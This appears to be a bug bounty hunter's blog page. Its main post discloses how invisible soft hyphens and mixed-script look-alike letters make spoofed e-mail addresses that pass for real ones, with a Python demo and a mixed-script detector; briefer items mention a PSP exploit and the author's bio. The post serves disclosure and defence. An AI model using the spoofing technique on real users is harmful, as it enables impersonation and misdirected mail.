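# U+00AD (soft hyphen) is invisible in most renderings, but it is still
# a character: the two addresses differ as data.
SOFT_HYPHEN = "\u00ad"
plain   = "inti@deceukelai.re"
spoofed = "in" + SOFT_HYPHEN + "ti@deceukelai.re"

print(plain == spoofed)           # False: two different mailboxes
print(len(spoofed) - len(plain))  # 1: the extra invisible character
```

Two strings your eyes cannot tell apart, yet any mail server will treat them as two different mailboxes.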

Monday morning at work. You receive the following mail from your colleague, who happens to be me.


You recognize my e-mail address and send me the document. Or did you? You actually replied to in­ti@dece­ukelai.re instead of inti@deceukelai.re, without ever noticing you had been tricked. Sounds like a problem to me.

After reporting this bug, it miraculously got fixed, even though my initial tests showed that the vulnerability did exist. I noticed, however, that it was still possible to mount a homograph attack by mixing look-alike characters from different scripts (e.g. Latin and Greek).



Even though these e-mail addresses may look the same, they are not: the first letter of the e-mail address is a look-alike character from another script. So let's say you send a mail to


You think you are sending your message to me, but you are not, as the "e" of "de" is a letter from another alphabet. If the server, in this case Gmail's, supports the creation of SMTPUTF8 e-mail addresses (and it will, shortly), then this e-mail could be delivered to a different user without anyone even noticing.
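One way a mail provider could flag such addresses, sketched here in a deliberately simplified form (real confusable detection is specified in Unicode Technical Standard #39), is to reject local parts that mix letters from more than one script:

```python
# Simplified mixed-script detector: derive a rough script name from each
# letter's Unicode character name and flag local parts that mix scripts.
import unicodedata

CHECKED_SCRIPTS = ("LATIN", "GREEK", "CYRILLIC")

def scripts(text: str) -> set:
    found = set()
    for ch in text:
        if ch.isalpha():
            name = unicodedata.name(ch, "")
            for script in CHECKED_SCRIPTS:
                if name.startswith(script):
                    found.add(script)
    return found

def looks_mixed_script(local_part: str) -> bool:
    return len(scripts(local_part)) > 1
```

For example, "inti" written entirely in Latin letters passes, while the same word with a Cyrillic or Greek look-alike swapped in gets flagged.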

I reported this additional information to Google and they replied that they are working on it, but also that my report does not qualify for a reward.

I am publishing this to show the dangers of the new RFC 6530 e-mail standard. While I do believe globalisation is a good thing, we should watch our steps towards it carefully. Nobody wants to get lost in translation.

I was feeling a bit "unlucky" to see my work did not get rewarded. But that's life, I guess.
Luckily, I found some vulnerabilities at Facebook that did get a generous reward. I will do a write-up on those soon.
Stay tuned!

Exploit – Hacking the PlayStation Portable

Before I got into web security, I was involved in the PlayStation Portable scene, operating under the alias TiPi. During this period of swinging somewhere between script kiddie and ambitious newbie, I accidentally found my first bug while testing my device's capabilities. Little did I know that this would later turn out to be a fully working VSH (usermode) exploit that could be combined with a kernel (admin) exploit, enabling root access on all of the latest PlayStation Portable devices. This exploit would later become known as VSHBL.

My first steps into the hacking world, hooray!

As the secret keys used to sign PSP software leaked out during this period, we never really got around to releasing this exploit. I did, however, write a guide on the things I learned that you may find interesting. Even though the guide dates back to 2011, I'd still like to share the link here.


I hope you enjoy reading this little piece of literature. Stay tuned for more!


Before we get into business, let's get to know each other.

My name is Inti. I live in some small European country people call Belgium, short for fries, beer and chocolate.

I prefer breaking things over making things. As a child, I was always fascinated by how things work; eventually I'd just pull them apart until they broke. As a computer nerd, I'm still kind of doing the same:

I am a bug bounty hunter with notable references such as Google, Facebook, Microsoft, Yahoo, Metallica and so on. Yes, I am a white hat hacker, which means I hunt for security leaks, but instead of exploiting them, I report them to the vendor. I'm a die-hard advocate of responsible disclosure and believe it is the best way to fight the growing wave of security breaches.

I could write a whole book about myself and my opinions on disclosure models, but that's not the purpose of this blog. If you have any further questions, come and say hi at inti.de.ceukelaire [at] gmail.com.

Enjoy your stay!